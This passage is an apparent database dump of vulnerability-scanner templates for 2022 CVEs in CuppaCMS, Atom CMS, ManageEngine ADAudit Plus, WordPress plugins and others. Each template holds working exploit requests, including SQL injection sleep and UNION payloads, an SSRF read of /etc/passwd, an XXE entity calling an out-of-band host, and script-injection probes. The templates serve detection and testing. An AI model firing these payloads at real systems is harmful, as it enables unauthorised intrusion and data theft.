vulnerability (CVE-2022-27984).\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27984\n - https://www.cuppacms.com/\n - http://cuppa.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-27984\n cwe-id: CWE-89\n epss-score: 0.03664\n epss-percentile: 0.90798\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n @timeout: 20s\n POST /templates/default/html/windows/right.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n menu_filter=3'+AND+SLEEP(6)--+-&id=211&url=components%2Fmenu%2Fhtml%2Fedit.php&path=component%2Fmenu%2F%26menu_filter%3D3&uniqueClass=window_right_7526357\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"components/menu/classes/functions.php\")'\n condition: and\n# digest: 490a0046304402202aca533ac7ec45941b256cec0f2b6411d28d608d69acb8b69ac2b57149574dd20220547b7a1151e2e064fb860d2324294e7f3bc54a6b8b17a3d7e7411e3543d47d13:922c64590222798bb761d5b6d8e72950", "hash": "489e0b309c5fc26a08bd8f014678ab81", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f4" }, "name": "CVE-2022-27985.yaml", "content": "id: CVE-2022-27985\n\ninfo:\n name: Cuppa CMS v1.0 - SQL injection\n author: theamanrawat\n severity: critical\n description: |\n CuppaCMS v1.0 was discovered to contain a SQL injection vulnerability via /administrator/alerts/alertLightbox.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire CMS system.\n remediation: |\n Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the SQL injection vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-27985\n - http://cuppa.com\n - http://www.cuppacms.com/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-27985\n cwe-id: CWE-89\n epss-score: 0.02343\n epss-percentile: 0.89527\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,sqli,cuppa,authenticated,cuppacms\nvariables:\n num: '999999999'\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /alerts/alertLightbox.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n url=components%2Fpermissions%2Flist_permissions_lightbox.php&title=Permissions%3A+profile¶ms%5Bgroup%5D=3'+UNION+ALL+SELECT+md5('{{num}}'),null--+-¶ms%5Breference%5D=41&uniqueClass=new_content_3983163\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{{md5(num)}}'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100840dc614f9b8dc4a922d2ecf069a41511326c836f551341d59ca5f56b6d3e2aa02206d9425bf0e7a02ee89a404733062fac7773ec9a5c2166c8a56d00fc1ef080f12:922c64590222798bb761d5b6d8e72950", "hash": "3525f4c139fd2503111e5b6692fa7dab", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f5" }, "name": "CVE-2022-28022.yaml", "content": "id: CVE-2022-28022\n\ninfo:\n name: Purchase Order Management v1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_item.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Purchase Order Management v1.0 application.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-1.md\n - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28022\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/debug601/bug_report\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-28022\n cwe-id: CWE-89\n epss-score: 0.02031\n epss-percentile: 0.87755\n cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: purchase_order_management_system_project\n product: purchase_order_management_system\n tags: cve,cve2022,sqli,purchase-order-management-system,purchase_order_management_system_project\n\nhttp:\n - raw:\n - |\n POST /classes/Master.php?f=delete_item HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n id=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\")'\n condition: and\n# digest: 490a0046304402207642be1d7f464fbdee2b2c77ec3ff7744acd40cd51c5d4b48b4d5a1b9eb298970220699beadc0427e71dde4e50f58c205c159cd96486d5cfb6ae26453b5c8a316cca:922c64590222798bb761d5b6d8e72950", "hash": "dde428b70f65cd6256ec6be36eec53a8", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f6" }, "name": "CVE-2022-28023.yaml", "content": "id: CVE-2022-28023\n\ninfo:\n name: Purchase Order Management v1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n Purchase Order Management System v1.0 was discovered to contain a SQL injection vulnerability via /purchase_order/classes/Master.php?f=delete_supplier.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/debug601/bug_report/blob/main/vendors/oretnom23/purchase-order-management-system/SQLi-2.md\n - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28023\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/debug601/bug_report\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-28023\n cwe-id: CWE-89\n epss-score: 0.02266\n epss-percentile: 0.8936\n cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: purchase_order_management_system_project\n product: purchase_order_management_system\n tags: cve,cve2022,sqli,purchase-order,poms,purchase_order_management_system_project\n\nhttp:\n - raw:\n - |\n POST /classes/Master.php?f=delete_supplier HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n id=aman'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \"status\\\":\\\"success\")'\n condition: and\n# digest: 490a0046304402202679435e70ec7ff77e6356d469e8b023129f6b3378ff568e3d494c06c9bd77530220519ab2ca116d285eff6637fc9215b435f91e6d061fdfc904ee37adad8e051fd6:922c64590222798bb761d5b6d8e72950", "hash": "16f459b571c4cf52d23707b9d23daeee", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f7" }, "name": "CVE-2022-28032.yaml", "content": "id: CVE-2022-28032\n\ninfo:\n name: Atom CMS v2.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n AtomCMS 2.0 is vulnerable to SQL Injection via Atom.CMS_admin_ajax_pages.php\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version Atom CMS v2.1\n reference:\n - https://github.com/thedigicraft/Atom.CMS/issues/263\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28032\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/bornrootcom/fictional-memory\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-28032\n cwe-id: CWE-89\n epss-score: 0.02266\n epss-percentile: 0.8936\n cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: thedigitalcraft\n product: atomcms\n tags: cve,cve2022,sqli,atom,cms,thedigitalcraft\n\nhttp:\n - raw:\n - |\n @timeout: 20s\n GET /admin/ajax/pages.php?id=(sleep(6)) HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"Page Deleted\")'\n condition: and\n# digest: 4b0a0048304602210094d3f24fad25a6ad53537e08fc90fcff2bc0b990b179300cf9ca237b2cb0ddc0022100b1f33b959d642b04732cc8fa792d91295bd120f8cef3e993037a2ebf0ab3665c:922c64590222798bb761d5b6d8e72950", "hash": "ec3d7181c422a40f1cd6258152967412", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f8" }, "name": "CVE-2022-28079.yaml", "content": "id: CVE-2022-28079\n\ninfo:\n name: College Management System 1.0 - SQL Injection\n author: ritikchaddha\n severity: high\n description: |\n College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated\n - https://download.code-projects.org/details/1c3b87e5-f6a6-46dd-9b5f-19c39667866f\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28079\n - https://code-projects.org/college-management-system-in-php-with-source-code/\n - https://www.nu11secur1ty.com/2022/05/cve-2022-28079.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-28079\n cwe-id: CWE-89\n epss-score: 0.80212\n epss-percentile: 0.98029\n cpe: cpe:2.3:a:college_management_system_project:college_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: college_management_system_project\n product: college_management_system\n tags: cve,cve2022,sqli,cms,collegemanagement,college_management_system_project\nvariables:\n num: \"999999999\"\n\nhttp:\n - raw:\n - |\n POST /admin/asign-single-student-subjects.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5({{num}}),12,21),NULL,NULL,NULL,NULL#\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{{md5({{num}})}}'\n\n - type: status\n status:\n - 302\n# digest: 4b0a00483046022100ad3280dd169fc265e15a1fb1734bb88fbfe21000ca36ebab37d25784e71c6416022100a02f6644e9b1a7fd03fc3523742435de169ba87b7c110db223a9010dad57fa2a:922c64590222798bb761d5b6d8e72950", "hash": "1493d69f278ab95330337efff15f5428", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084f9" }, "name": "CVE-2022-28080.yaml", "content": "id: CVE-2022-28080\n\ninfo:\n name: Royal Event - SQL Injection\n author: lucasljm2001,ekrause,ritikchaddha\n severity: high\n description: |\n Royal Event is vulnerable to a SQL injection vulnerability.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire database.\n remediation: |\n To remediate this vulnerability, input validation and parameterized queries should be implemented to prevent SQL Injection attacks.\n reference:\n - https://www.exploit-db.com/exploits/50934\n - https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip\n - https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28080\n - https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-28080\n cwe-id: CWE-89\n epss-score: 0.01461\n epss-percentile: 0.86424\n cpe: cpe:2.3:a:event_management_system_project:event_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: event_management_system_project\n product: event_management_system\n tags: cve,cve2022,royalevent,edb,sqli,authenticated,cms,intrusive,event_management_system_project\n\nhttp:\n - raw:\n - |\n POST /royal_event/ HTTP/1.1\n Host: {{Hostname}}\n Content-Length: 353\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n ------WebKitFormBoundaryCSxQll1eihcqgIgD\n Content-Disposition: form-data; name=\"username\"\n\n {{username}}\n ------WebKitFormBoundaryCSxQll1eihcqgIgD\n Content-Disposition: form-data; name=\"password\"\n\n {{password}}\n ------WebKitFormBoundaryCSxQll1eihcqgIgD\n Content-Disposition: form-data; name=\"login\"\n\n\n ------WebKitFormBoundaryCSxQll1eihcqgIgD--\n - |\n POST /royal_event/btndates_report.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n ------WebKitFormBoundaryFboH5ITu7DsGIGrD\n Content-Disposition: form-data; name=\"todate\"\n\n 1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n ------WebKitFormBoundaryFboH5ITu7DsGIGrD\n Content-Disposition: form-data; name=\"search\"\n\n 3\n ------WebKitFormBoundaryFboH5ITu7DsGIGrD\n Content-Disposition: form-data; name=\"fromdate\"\n\n 01/01/2011\n ------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '{{md5(\"{{randstr}}\")}}'\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950", "hash": "444e9305c08679ec45a6d9aac7ee5de8", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fa" }, "name": "CVE-2022-28117.yaml", "content": "id: CVE-2022-28117\n\ninfo:\n name: Navigate CMS 2.9.4 - Server-Side Request Forgery\n author: theabhinavgaur\n severity: medium\n description: |\n Navigate CMS 2.9.4 is susceptible to server-side request forgery via feed_parser class. This can allow a remote attacker to force the application to make arbitrary requests via injection of arbitrary URLs into the feed parameter, thus enabling possible theft of sensitive information, data modification, and/or unauthorized operation execution.\n impact: |\n An attacker can exploit this vulnerability to bypass security controls, access internal resources, and potentially perform further attacks.\n remediation: |\n Upgrade to a patched version of Navigate CMS or apply the vendor-provided patch to mitigate the SSRF vulnerability.\n reference:\n - https://packetstormsecurity.com/files/167063/Navigate-CMS-2.9.4-Server-Side-Request-Forgery.html\n - https://www.navigatecms.com/en/blog/development/navigate_cms_update_2_9_5\n - https://www.youtube.com/watch?v=4kHW95CMfD0\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28117\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 4.9\n cve-id: CVE-2022-28117\n cwe-id: CWE-918\n epss-score: 0.03193\n epss-percentile: 0.9018\n cpe: cpe:2.3:a:naviwebs:navigate_cms:2.9.4:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: naviwebs\n product: navigate_cms\n tags: cve,cve2022,authenticated,packetstorm,ssrf,navigate,cms,lfi,intrusive,naviwebs\n\nhttp:\n - raw:\n - |\n GET /navigate/login.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /navigate/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n -----------------------------123456789012345678901234567890\n Content-Disposition: form-data; name=\"login-username\"\n\n {{username}}\n -----------------------------123456789012345678901234567890\n Content-Disposition: form-data; name=\"csrf_token\"\n\n {{csrf_token}}\n -----------------------------123456789012345678901234567890\n Content-Disposition: form-data; name=\"login-password\"\n\n {{password}}\n -----------------------------123456789012345678901234567890\n - |\n POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n limit=5&language=en&url=file:///etc/passwd\n - |\n GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf_token\n group: 1\n regex:\n - csrf_token\" value=\"([a-f0-9]{64})\n internal: true\n part: body\n# digest: 4b0a00483046022100b936ab16d4511ae94e20920ea423189e833767cd09607b9fd39ae31767758827022100e19df53050f82f76d6172e2c94eb2f93c01f249e4ce37a65a2e05d4c7624ba12:922c64590222798bb761d5b6d8e72950", "hash": "8fd1db4ed0dbecb9ff307f0aed34fa33", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fb" }, "name": "CVE-2022-28219.yaml", "content": "id: CVE-2022-28219\n\ninfo:\n name: Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution\n author: dwisiswant0\n severity: critical\n description: |\n Zoho ManageEngine ADAudit Plus before version 7060 is vulnerable to an\n unauthenticated XML entity injection attack that can lead to remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code or perform remote code execution on the affected system.\n remediation: |\n Update to ADAudit Plus build 7060 or later, and ensure ADAudit Plus\n is configured with a dedicated service account with restricted privileges.\n reference:\n - https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html\n - https://www.horizon3.ai/red-team-blog-cve-2022-28219/\n - https://manageengine.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28219\n - http://cewolf.sourceforge.net/new/index.html\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-28219\n cwe-id: CWE-611\n epss-score: 0.97392\n epss-percentile: 0.99909\n cpe: cpe:2.3:a:zohocorp:manageengine_adaudit_plus:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: zohocorp\n product: manageengine_adaudit_plus\n shodan-query: http.title:\"ADAudit Plus\" || http.title:\"ManageEngine - ADManager Plus\"\n tags: cve,cve2022,xxe,rce,zoho,manageengine,unauth,zohocorp\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/api/agent/tabs/agentData\"\n\n body: |\n [\n {\n \"DomainName\": \"{{Host}}\",\n \"EventCode\": 4688,\n \"EventType\": 0,\n \"TimeGenerated\": 0,\n \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n }\n ]\n\n headers:\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: body\n words:\n - \"ManageEngine\"\n# digest: 4b0a00483046022100adfe043ed717eb4c2bd34e54d594afa7fcd27ffa6a5abaa6d34ae8fe396dcd53022100ad5db93b3daf8c1043b3d88354716768831713fd53728c5fe7d83373dbdca6b8:922c64590222798bb761d5b6d8e72950", "hash": "490561578a7d4269ba401d164b1b92fe", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fc" }, "name": "CVE-2022-28290.yaml", "content": "id: CVE-2022-28290\n\ninfo:\n name: WordPress Country Selector <1.6.6 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: |\n WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update WordPress Country Selector plugin to version 1.6.6 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/6c5a4bce-6266-4cfc-bc87-4fc3e36cb479\n - https://cybersecurityworks.com/zerodays/cve-2022-28290-reflected-cross-site-scripting-in-welaunch.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28290\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-28290\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36353\n cpe: cpe:2.3:a:welaunch:wordpress_country_selector:1.6.5:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 2\n vendor: welaunch\n product: wordpress_country_selector\n framework: wordpress\n tags: cve,cve2022,wordpress-country-selector,wpscan,wp,wordpress,wp-plugin,xss,welaunch\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n POST /wp-admin/admin-ajax.php?action=check_country_selector HTTP/2\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n country=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&lang=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E&site_locate=en-US\n\n skip-variables-check: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<img src=x onerror=alert(document.domain)>'\n - 'country_selector_'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ebe533ef2ec09740f696d061f09daee596b1bfa0a1a88c9b3fe5abd00eeddd9e02205eca23209af224a5ef2c7ab7d53b737c3db0bb4012a36bf2b6c193725f4d3ae6:922c64590222798bb761d5b6d8e72950", "hash": "60b0b83a562c94134601950bd1cdcc16", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fd" }, "name": "CVE-2022-28363.yaml", "content": "id: CVE-2022-28363\n\ninfo:\n name: Reprise License Manager 14.2 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: |\n Reprise License Manager 14.2 contains a reflected cross-site scripting vulnerability in the /goform/login_process 'username' parameter via GET, whereby no authentication is required.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of Reprise License Manager or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://www.reprisesoftware.com/products/software-license-management.php\n - https://github.com/advisories/GHSA-rpvc-qgrm-r54f\n - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28363\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-28363\n cwe-id: CWE-79\n epss-score: 0.00237\n epss-percentile: 0.61062\n cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: reprisesoftware\n product: reprise_license_manager\n tags: cve,cve2022,xss,rlm,packetstorm,reprisesoftware\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/goform/login_process?username=test%22%3E%3Csvg/onload=alert(document.domain)%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<svg/onload=alert(document.domain)>'\n - 'Login Failed'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210083399ab30c18aa4ee9e8a8dc77c6a1dc50feb2092036ee0a9fea49eba0c770a4022100aba47004ae87a814261cb712697ce39cb06ac5da29c432abb75c5ec9fac9738c:922c64590222798bb761d5b6d8e72950", "hash": "f60f1d1d22e61759216a699cfbcf8953", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084fe" }, "name": "CVE-2022-28365.yaml", "content": "id: CVE-2022-28365\n\ninfo:\n name: Reprise License Manager 14.2 - Information Disclosure\n author: Akincibor\n severity: medium\n description: |\n Reprise License Manager 14.2 is susceptible to information disclosure via a GET request to /goforms/rlminfo. No authentication is required. The information disclosed is associated with software versions, process IDs, network configuration, hostname(s), system architecture and file/directory information. An attacker can possibly obtain further sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to gain sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a non-vulnerable version of Reprise License Manager.\n reference:\n - https://www.reprisesoftware.com/products/software-license-management.php\n - https://github.com/advisories/GHSA-4g2v-6x25-vr7p\n - http://packetstormsecurity.com/files/166647/Reprise-License-Manager-14.2-Cross-Site-Scripting-Information-Disclosure.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28365\n - https://www.reprisesoftware.com/RELEASE_NOTES\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2022-28365\n cwe-id: CWE-425\n epss-score: 0.00689\n epss-percentile: 0.77964\n cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: reprisesoftware\n product: reprise_license_manager\n tags: cve,cve2022,rlm,packetstorm,exposure,reprisesoftware\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/goforms/rlminfo\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"RLM Version\"\n - \"Platform type\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009238cd94d4ea391e4ba3a8fd9b6b9e4d2b1b35ea6b4618985cbd7679ba6c26aa022046b75d3e44aef88da8a1c3a43d4d2f499141f72031f265049c0993976f2531de:922c64590222798bb761d5b6d8e72950", "hash": "90d140be6882fd6fab3a0cfaaec1df8a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3084ff" }, "name": "CVE-2022-2863.yaml", "content": "id: CVE-2022-2863\n\ninfo:\n name: WordPress WPvivid Backup <0.9.76 - Local File Inclusion\n author: tehtbl\n severity: medium\n description: WordPress WPvivid Backup version 0.9.76 is vulnerable to local file inclusion because the plugin does not sanitize and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire WordPress installation.\n remediation: Upgrade to version 0.9.76 or later.\n reference:\n - https://seclists.org/fulldisclosure/2022/Oct/0\n - https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5\n - http://packetstormsecurity.com/files/168616/WordPress-WPvivid-Backup-Path-Traversal.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-2863\n - https://github.com/rodnt/rodnt\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 4.9\n cve-id: CVE-2022-2863\n cwe-id: CWE-22\n epss-score: 0.43289\n epss-percentile: 0.97257\n cpe: cpe:2.3:a:wpvivid:migration\\,_backup\\,_staging:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 3\n vendor: wpvivid\n product: migration\\,_backup\\,_staging\n framework: wordpress\n tags: 